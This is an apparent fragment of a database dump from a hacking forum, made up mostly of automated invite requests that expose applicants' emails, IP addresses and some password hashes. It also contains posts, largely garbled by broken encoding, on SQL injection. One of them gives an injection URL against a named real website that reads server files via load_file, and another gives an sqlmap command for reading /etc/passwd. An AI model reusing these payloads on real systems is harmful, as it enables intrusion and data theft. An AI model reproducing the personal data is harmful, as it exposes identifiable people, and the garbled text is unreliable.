from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 197.28.96.190\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://thehackersmedia.blogspot.com/.../googleps-hacked-by-cold-z3ro-hackteach.html | http://thehackersmedia.blogspot.com/.../googleps-hacked-by-cold-z3ro-hackteach.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1740, 1083, 1707, 'BigBear', 34, '', 1408630045, '[quote=kx00;1707]ÿрøòõт ñøр рðô чтþ ты Ѡýðüø. \r\nòþÿрþÑÂ. úтþ ýøть ÿþхõúðû [url]http://toranoana.jp?[/url][/quote]\r\n\r\nÿрøòõт. Ѡõóþ ø÷учðû. ôðûьшõ чøтðûúø ýõ ушёÃ».', 1, 0, '', 0, 1, 0, 0, 0), (1741, 1550, 0, 'Invite', 2, '{$name}', 1408630707, '[SIZE=\'4\'][COLOR=\'Sienna\']balooba[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: r0c@hotmail.fr\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.108.192.244\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://balooba.be | balooba.be \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1742, 1551, 0, 'Invite', 2, '{$name}', 1408633599, '[SIZE=\'4\'][COLOR=\'Sienna\']Gladiator[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: nima.nikjoo@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.165.232.213\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : gladiator : hacking_gladiator@yahoo.com : : dd02dcdcddd41eb7d0bb3162005df705\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/gladiator_mmdm | http://vk.com/gladiator_mmdm \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1744, 1553, 0, 'Invite', 2, '{$name}', 1408682381, '[SIZE=\'4\'][COLOR=\'Sienna\']w0rmm[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: net.wer.ksal.es@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 67.11.244.132\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://w0rmm.deviantart.com | w0rmm.deviantart.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1745, 1015, 1019, 'BigBear', 34, '', 1408685109, '[QUOTE=w0rm;1019]- antichat \r\n- asechka\r\n- blackseoschool\r\n- cih.ms\r\n- damagelab\r\n- darklife\r\n- dehak.ru\r\n- exploit.in\r\n- hackzone\r\n- kode.cc\r\n- rdot\r\n- maza\r\n- korovka.cc\r\n- milw0rm\r\n\r\n[URL=\"https://www.dropbox.com/s/d6y388k6e9eum1h/%D0%9C%D0%B0%D0%BA.zip\"]download[/URL][/QUOTE]\r\n\r\nÜþöõт úтþ ÿõрõ÷ðûøть?', 1, 0, '', 0, 1, 0, 0, 0), (1746, 1092, 1141, 'BigBear', 34, '', 1408685141, 'ßõрõ÷ðûõùтõ ÿû÷', 1, 0, '', 0, 1, 0, 0, 0), (1747, 1092, 1141, 'w0rm', 1, '', 1408699157, 'ÃÂõ ôþûóþ ÿрþöøòõт..\n[URL=\"https://www.sendspace.com/file/2fl21o\"]link[/URL]', 1, 0, '', 0, 1, 0, 0, 0), (1748, 1554, 0, 'Invite', 2, '{$name}', 1408701894, '[SIZE=\'4\'][COLOR=\'Sienna\']myst3ry[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: vegetauchiw@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 78.193.93.120\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.meetme.com/member/102544185 | http://www.meetme.com/member/102544185 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1749, 1555, 0, 'Invite', 2, '{$name}', 1408701895, '[SIZE=\'4\'][COLOR=\'Sienna\']myst3ry[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: vegetauchiwa@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 78.193.93.120\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.meetme.com/member/102544185 | http://www.meetme.com/member/102544185 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1750, 1556, 0, 'Invite', 2, '{$name}', 1408701897, '[SIZE=\'4\'][COLOR=\'Sienna\']myst3ry[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: vegetauchiwa@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 78.193.93.120\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.meetme.com/member/102544185 | http://www.meetme.com/member/102544185 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1751, 1557, 0, 'Invite', 2, '{$name}', 1408709496, '[SIZE=\'4\'][COLOR=\'Sienna\']owned[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ownedhf@jabb3r.net\n[b]e-mail[/b]: ownedhf@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.203.67.150\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : owned : die_for_it@hotmail.com : : e26d22a6650fe8a1f15054f2563aa4ba\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://owned.com | owned.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1752, 1558, 0, 'Invite', 2, '{$name}', 1408713612, '[SIZE=\'4\'][COLOR=\'Sienna\']DeAd HaCkErZ[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: d99hk1991@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 105.42.158.222\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Linux; Android 4.4.2; SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Mobile Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://dead-hackerz.software.informer.com | dead-hackerz.software.informer.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1753, 1559, 0, 'Invite', 2, '{$name}', 1408718412, '[SIZE=\'4\'][COLOR=\'Sienna\']Bletch[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 315113661\n[b]e-mail[/b]: kdopez@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.215.169.87\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/hashtag/bletch | https://twitter.com/hashtag/bletch \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1754, 1083, 1119, 'Psych0tr1a', 11, '', 1408736414, 'òыûþöø ÿþöðûуùÑÂтð ÿþúþòырÑÂõü òÑÂõ òüõÑÂтõ.', 1, 0, '', 0, 1, 0, 0, 0), (1755, 1560, 0, 'Psych0tr1a', 11, 'ßþüþóøтõ ýðùтø чøтðûúу фðùûþò ôûѠblind sqli', 1408737328, 'ÑÂðñö ò ýð÷òðýøø ÿþÑÂтð\r\nòøôõû ýð ðчðтõ òрþôõñы ýþ ÷òýþòþ ýðùтø ýõ ÑÂüþó', 1, 0, '', 0, 1, 0, 0, 0), (1756, 1067, 1086, 'Psych0tr1a', 11, '', 1408738759, '[code]http://www.thaimail.com/chkuser.php?uid=qwerty\'+and+length(load_file(\'/usr/local/www/apache22/data/\'))!=0+--+&password=concac[/code]\n\nòþт ÿþúð чтþ уôðûþÑÂÑŒ ÿþôþñрðть\núðú òøôýþ - чøтðютÑÂѠýõтþûьúþ фðùûы ýþ ø ôøры.\nхþрþшую чøтðûúу ñы ôûѠñûðõýôð - ÷ðûøÃȄÂÑŒ ñы ôðòýþ ôð ø ÑÂôðüÿøûø ñы ýðхрõý òÑÂõх ю÷õрþò. \nýð óûðòýþù òøÑÂøт ÑÂþþñщõýøõ чтþ 1 ÑÂõýтÑÂñрѠÿрþõúт ÷ðúрыòðõтÑÂÑÂ(( þÑÂтðûþÑÂÑŒ òрõüõýø ýõüýþóþ.', 1, 0, '', 0, 1, 0, 0, 0), (1757, 1561, 0, 'Invite', 2, '{$name}', 1408756163, '[SIZE=\'4\'][COLOR=\'Sienna\']Jimbar[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: jimbar@jabber.org\n[b]e-mail[/b]: jimbar@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 162.218.67.147\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/JimsBarPdc | https://twitter.com/JimsBarPdc \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1758, 1067, 1756, 'kx00', 6, '', 1408766487, '[quote=psych0tr1a;1756][code]http://www.thaimail.com/chkuser.php?uid=qwerty\'+and+length(load_file(\'/usr/local/www/apache22/data/\'))!=0+--+&password=concac[/code]\r\n\r\nòþт ÿþúð чтþ уôðûþÑÂÑŒ ÿþôþñрðть\r\núðú òøôýþ - чøтðютÑÂѠýõтþûьúþ фðùûы ýþ ø ôøры.\r\nхþрþшую чøтðûúу ñы ôûѠñûðõýôð - ÷ðûøÃȄÂÑŒ ñы ôðòýþ ôð ø ÑÂôðüÿøûø ñы ýðхрõý òÑÂõх ю÷õрþò. \r\nýð óûðòýþù òøÑÂøт ÑÂþþñщõýøõ чтþ 1 ÑÂõýтÑÂñрѠÿрþõúт ÷ðúрыòðõтÑÂÑÂ(( þÑÂтðûþÑÂÑŒ òрõüõýø ýõüýþóþ.[/quote]\r\n\r\nÑÂüыÑÂûð ýõт øÑÂúðть чøтðûúу. ñð÷ð ýðхþôøтьÑÂѠ÷ð nat\'þü, ôðöõ õÑÂûø ÷ðûьõüÑÂÑÂ, üы ýõ ÑÂüþöõü ÿþûучøть ôþÑÂтуÿ ú шõûûу. Lfi, òðрøðýт тðú ÑÂõñõ, øôõт рþтðцøѠûþóþò(ÑÂöðтøõ). òðрøðýт ѠÿрþцõÑÂÑÂðüø þÑÂтðõтÑÂÑÂ, ýþ Ѡõóþ úрутøû ø ø÷-÷ð úðúþù тþ хõрýø ñрþÑÂøû. ýõ ÿþüýю ÿþчõüу.', 1, 1, '', 0, 1, 0, 0, 0), (1759, 1562, 0, 'Invite', 2, '{$name}', 1408772622, '[SIZE=\'4\'][COLOR=\'Sienna\']nofade[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: nofade13@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 90.8.224.31\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1760, 1563, 0, 'Invite', 2, '{$name}', 1408772650, '[SIZE=\'4\'][COLOR=\'Sienna\']dr0id[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: skype formatmezzz\n[b]e-mail[/b]: gmleaked@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 173.55.160.38\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://dr0id.ru | dr0id.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1761, 1564, 0, 'Invite', 2, '{$name}', 1408791716, '[SIZE=\'4\'][COLOR=\'Sienna\']fri3ndlyfir3[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: frindlyfire2013@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\ni have little programing experience in VB.NET.\r\nand also Security adviser in Software House.\r\n\r\n\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 103.246.114.79\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140610 Firefox/24.0 Iceweasel/24.6.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://fri3ndlyfir3.znih.com | fri3ndlyfir3.znih.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1762, 1560, 1755, '123', 41, '', 1408799602, 'sqlmap ýõ?', 1, 0, '', 0, 1, 0, 0, 0), (1763, 1560, 1755, 'w0rm', 1, '', 1408802161, 'sqlmap -u \"http://\" --file-read=\"/etc/passwd\"', 1, 0, '', 0, 1, 0, 0, 0), (1765, 1565, 0, 'Invite', 2, '{$name}', 1408808934, '[SIZE=\'4\'][COLOR=\'Sienna\']Emerakul[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Emerakul@expliot.im\n[b]e-mail[/b]: Emerakul@cock.li\n[b]Info[/b]: Hello all,\r\n\r\nMy name is Emerakul. I am interested in buying exploits/exploitable websites. I want to check this place out soon.\r\n\r\nA little bit about myself, I am Emerakul. I am a botnet coder, and I hail from some far corners of the earth.\r\n\r\nRegards,\r\nEmerakul\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 67.177.97.90\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: 